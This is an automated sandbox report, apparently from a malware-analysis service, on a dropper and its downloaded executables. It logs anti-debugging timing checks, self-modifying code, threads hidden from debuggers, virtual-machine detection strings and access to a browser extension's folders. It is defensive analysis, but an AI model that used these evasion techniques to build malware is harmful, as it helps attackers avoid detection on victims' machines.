00007F6D18BC6CC4h 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: CD52F4 second address: CD5340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F6D19596918h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 jp 00007F6D1959691Ah 0x0000002b push DA17AE9Bh 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 jmp 00007F6D1959691Dh 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: CD5340 second address: CD5345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: CD5345 second address: CD53AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F6D19596929h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 25E851E5h 0x00000012 mov dword ptr [ebp+122D37BDh], ecx 0x00000018 mov si, di 0x0000001b push 00000003h 0x0000001d call 00007F6D1959691Dh 0x00000022 movzx edi, dx 0x00000025 pop edx 0x00000026 push 00000000h 0x00000028 xor si, 5D5Fh 0x0000002d push 00000003h 0x0000002f sub edx, dword ptr [ebp+122D2CAEh] 0x00000035 push A8F21C87h 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F6D19596920h 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: CD53AD second address: CD5411 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6D18BC6CB8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 170DE379h 0x00000013 pushad 0x00000014 mov dword ptr [ebp+122D1C61h], esi 0x0000001a and esi, 34998A9Ah 0x00000020 popad 0x00000021 lea ebx, dword ptr [ebp+12459F54h] 0x00000027 pushad 0x00000028 jc 00007F6D18BC6CCAh 0x0000002e jmp 00007F6D18BC6CC4h 0x00000033 mov ebx, 23AD0800h 0x00000038 popad 0x00000039 xchg eax, ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushad 0x0000003e popad 0x0000003f jmp 00007F6D18BC6CC5h 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: CD5411 second address: CD5417 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: CD5417 second address: CD541B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53904D5 second address: 5390535 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 mov dx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d jmp 00007F6D19596924h 0x00000012 pushfd 0x00000013 jmp 00007F6D19596922h 0x00000018 adc ecx, 6957EAE8h 0x0000001e jmp 00007F6D1959691Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F6D19596925h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5390535 second address: 539053C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539053C second address: 5390559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push FFFFFFFEh 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6D19596922h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5390559 second address: 539055F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539055F second address: 5390563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5390563 second address: 53905C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call 00007F6D18BC6CB9h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F6D18BC6CBCh 0x00000017 adc eax, 089B3208h 0x0000001d jmp 00007F6D18BC6CBBh 0x00000022 popfd 0x00000023 mov bx, si 0x00000026 popad 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F6D18BC6CBEh 0x00000031 sub ah, 00000068h 0x00000034 jmp 00007F6D18BC6CBBh 0x00000039 popfd 0x0000003a mov edi, eax 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53905C8 second address: 539060A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 mov esi, 1ECFF0F3h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 mov esi, ebx 0x00000015 call 00007F6D1959691Bh 0x0000001a jmp 00007F6D19596928h 0x0000001f pop eax 0x00000020 popad 0x00000021 mov eax, dword ptr [eax] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539060A second address: 539060E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539060E second address: 5390614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5390614 second address: 5390640 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6D18BC6CBEh 0x00000014 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 71EB6D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 71EADF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 8C9A6B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: B4EB6D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: B4EADF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: CF9A6B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Special instruction interceptor: First address: C67CA9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Special instruction interceptor: First address: C67BE6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Special instruction interceptor: First address: E8CEDE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Special instruction interceptor: First address: AF9884 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Special instruction interceptor: First address: AF7F1C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Special instruction interceptor: First address: 9598E3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Special instruction interceptor: First address: B024B0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Special instruction interceptor: First address: B8E919 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Special instruction interceptor: First address: D37C41 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Special instruction interceptor: First address: F0BFE5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Special instruction interceptor: First address: DCFA06 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Special instruction interceptor: First address: DCD4CE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Special instruction interceptor: First address: F7679D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Special instruction interceptor: First address: 6BDD74 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Special instruction interceptor: First address: 6BDE3A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Special instruction interceptor: First address: 8588A1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Special instruction interceptor: First address: 866DDC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Special instruction interceptor: First address: 8EE3A0 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Memory allocated: 52F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Memory allocated: 55D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Memory allocated: 52F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Memory allocated: 4CF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Memory allocated: 4EF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Memory allocated: 6EF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Memory allocated: 4850000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Memory allocated: 49E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Memory allocated: 69E0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_053E06F3 rdtsc

0_2_053E06F3

Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 937	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 611	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1722	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 749	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 694	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 414	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Window / User API: threadDelayed 6492	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Window / User API: threadDelayed 3183	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Window / User API: threadDelayed 3367

Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe

API coverage: 0.3 %

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6312	Thread sleep time: -44022s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2416	Thread sleep count: 937 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2416	Thread sleep time: -1874937s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6908	Thread sleep count: 281 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6908	Thread sleep time: -8430000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5812	Thread sleep count: 611 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5812	Thread sleep time: -1222611s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3288	Thread sleep count: 1722 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3288	Thread sleep time: -3445722s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2640	Thread sleep count: 749 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2640	Thread sleep time: -1498749s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3288	Thread sleep count: 694 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3288	Thread sleep time: -1388694s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4180	Thread sleep count: 414 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4180	Thread sleep time: -828414s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe TID: 4592	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe TID: 3900	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe TID: 5800	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe TID: 1308	Thread sleep time: -56028s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe TID: 3104	Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe TID: 1148	Thread sleep time: -40000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe TID: 4852	Thread sleep time: -52026s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe TID: 3412	Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe TID: 6152	Thread sleep time: -90000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe TID: 3888	Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe TID: 3212	Thread sleep count: 260 > 30
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe TID: 3212	Thread sleep time: -1560000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe TID: 3196	Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe TID: 5196	Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe TID: 7652	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe TID: 7760	Thread sleep time: -33670s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe TID: 1532	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe TID: 7884	Thread sleep time: -60000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\1015354001\855be7cecf.exe

Thread sleep count: Count: 3367 delay: -10

Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe

Code function: 14_2_6D3FC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc,

14_2_6D3FC930

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Thread delayed: delay time: 30000

Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Source: skotes.exe, skotes.exe, 00000002.00000002.1805044429.0000000000CDC000.00000040.00000001.01000000.00000007.sdmp, H9TU4oY.exe, H9TU4oY.exe, 00000007.00000002.2612132094.0000000000DE0000.00000040.00000001.01000000.00000009.sdmp, c1ca3b12e5.exe, c1ca3b12e5.exe, 0000000D.00000002.2787417950.0000000000EC2000.00000040.00000001.01000000.0000000C.sdmp, 232a1df2aa.exe, 232a1df2aa.exe, 0000000E.00000002.3197547067.0000000000F48000.00000040.00000001.01000000.0000000D.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2939879174.0000000000EC2000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: c1ca3b12e5.exe, 0000000F.00000003.2862259021.000000000078B000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908148719.000000000078B000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.000000000078B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: file.exe, 00000000.00000003.1745366510.000000000169F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: H9TU4oY.exe, 00000007.00000003.2593473526.000000000163A000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626351473.000000000163A000.00000004.00000020.00020000.00000000.sdmp, 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: H9TU4oY.exe, 00000007.00000003.2542498583.0000000001673000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2592162489.0000000001673000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626586599.0000000001674000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000002.2789383376.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2723685131.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2862259021.000000000078B000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908148719.000000000078B000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.000000000078B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.00000000018DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: c1ca3b12e5.exe, 0000000D.00000003.2777917809.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000002.2789006406.00000000015AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: c1ca3b12e5.exe, 0000000F.00000002.2932347589.000000000074F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908992218.000000000074F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWHey%SystemRoot%\system32\mswsock.dll
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001924000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX`
Source: file.exe, 00000000.00000002.1770058847.00000000008AC000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1800619957.0000000000CDC000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1805044429.0000000000CDC000.00000040.00000001.01000000.00000007.sdmp, H9TU4oY.exe, 00000007.00000002.2612132094.0000000000DE0000.00000040.00000001.01000000.00000009.sdmp, c1ca3b12e5.exe, 0000000D.00000002.2787417950.0000000000EC2000.00000040.00000001.01000000.0000000C.sdmp, 232a1df2aa.exe, 0000000E.00000002.3197547067.0000000000F48000.00000040.00000001.01000000.0000000D.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2939879174.0000000000EC2000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	System information queried: CodeIntegrityInformation

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Thread information set: HideFromDebugger

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_053E0C94 Start: 053E0C5C End: 053E0C56		0_2_053E0C94
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_053E0687 Start: 053E07E1 End: 053E06B8		0_2_053E0687

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	Open window title or class name: regmonclass
